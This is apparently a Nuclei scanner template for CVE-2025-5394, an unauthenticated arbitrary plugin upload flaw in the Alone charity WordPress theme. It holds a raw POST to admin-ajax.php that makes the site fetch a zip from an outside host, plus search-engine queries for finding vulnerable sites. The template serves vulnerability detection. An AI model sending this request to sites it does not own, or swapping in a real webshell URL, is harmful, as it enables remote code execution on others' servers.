The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3.
PoC代码[已公开]
id: CVE-2025-5394
info:
name: Unauthenticated Arbitrary Plugin Upload in Alone Theme
author: Nxploited,DhiyaneshDK
severity: critical
description: |
The Alone – Charity Multipurpose Non-profit WordPress Theme theme for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the alone_import_pack_install_plugin() function in all versions up to, and including, 7.8.3.
impact: |
This makes it possible for unauthenticated attackers to upload zip files containing webshells disguised as plugins from remote locations to achieve remote code execution.
remediation: Fixed in 7.8.5.
reference:
- https://github.com/Nxploited/CVE-2025-5394/tree/main
- https://x.com/cloudflare/status/1951319364856058035?s=46
metadata:
verified: true
max-request: 1
publicwww-query: "/wp-content/themes/alone/"
fofa-query: body="/wp-content/themes/alone/"
tags: cve,cve2025,unauth,file-upload,rce,vkev
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=beplus_import_pack_install_plugin&data%5Bplugin_slug%5D=&data%5Bplugin_source%5D=https%3a%2f%2f{{interactsh-url}}%2fplugin%2f%7b%7b{{randstr}}%7d%7d.zip
# No plugin is uploaded or updated; just sending interactsh-url with randstr.
skip-variables-check: true
matchers:
- type: dsl
dsl:
- contains_all(body, '\"success\":true','\"substep\":\"activate\"')
- contains(content_type, 'application/json')
- status_code == 200
condition: and
# digest: 4b0a00483046022100b79ebfc0feb84521154d0410875f6c7cc3e94ce9b9bfc0a4abee5b0b0cbecb5b022100891b35a7ef22e9a8e730a4ec3a20a23025fddb792ceb20337b219009c7aa4656:922c64590222798bb761d5b6d8e72950